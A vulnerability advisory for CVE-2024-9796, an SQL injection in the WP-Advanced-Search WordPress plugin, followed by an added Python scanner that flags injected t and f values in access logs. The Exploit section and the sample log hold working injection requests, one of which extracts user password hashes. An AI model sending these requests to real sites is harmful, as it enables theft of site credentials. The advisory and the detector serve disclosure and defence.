CVE-2024-9796
A vulnerability classified as critical has been found in the WP-Advanced-Search plugin for WordPress, up to version 3.3.9.1. The affected part is unknown. Manipulating the argument t with an unknown input leads to an SQL injection vulnerability. CWE classifies the issue as CWE-89: the product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This affects confidentiality, integrity, and availability.
Exploit
curl "https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--&f=user_login&type=&e
The official disclosure at WPScan includes a PoC.
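A defender-side check for the requests shown above, as an added example that is not part of the original advisory or the plugin's code: it scans web access log lines for calls to the autocompletion endpoint whose t or f value is not a bare SQL identifier. The combined log format, the identifier rule and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path as given in the advisory above.
ENDPOINT = ("/wp-content/plugins/wp-advanced-search/class.inc/"
            "autocompletion/autocompletion-PHP5.5.php")
# Assumption: legitimate t/f values are bare SQL identifiers (table/column names).
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return {param: decoded value} for t/f values that are not bare identifiers."""
    url = urlsplit(target)
    if not url.path.endswith(ENDPOINT):
        return {}
    query = parse_qs(url.query, keep_blank_values=True)
    return {name: value
            for name in ("t", "f")
            for value in query.get(name, [])
            if not IDENT.match(value)}

def scan(lines):
    """Return (line number, client address, findings) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        findings = suspicious_params(match.group(1))
        if findings:
            hits.append((number, line.split(" ", 1)[0], findings))
    return hits

# Constructed sample log: documentation addresses, query strings modelled on the page.
LOG_FMT = '{ip} - - [10/Oct/2024:13:55:36 +0000] "GET {target} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    LOG_FMT.format(ip="198.51.100.7", target=ENDPOINT + "?q=adm&t=wp_posts&f=post_title&type=&e"),
    LOG_FMT.format(ip="203.0.113.9", target=ENDPOINT + "?q=admin&t=wp_users%20--&f=user_login&type=&e"),
    LOG_FMT.format(ip="203.0.113.9", target=ENDPOINT
                   + "?q=admin&t=wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--&f=user_login&type=&e"),
    LOG_FMT.format(ip="198.51.100.7", target="/?s=hello&t=1"),  # other path: ignored
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Values are URL-decoded before the identifier check, so percent-encoded spaces and keywords in t or f are caught regardless of how the request encodes them.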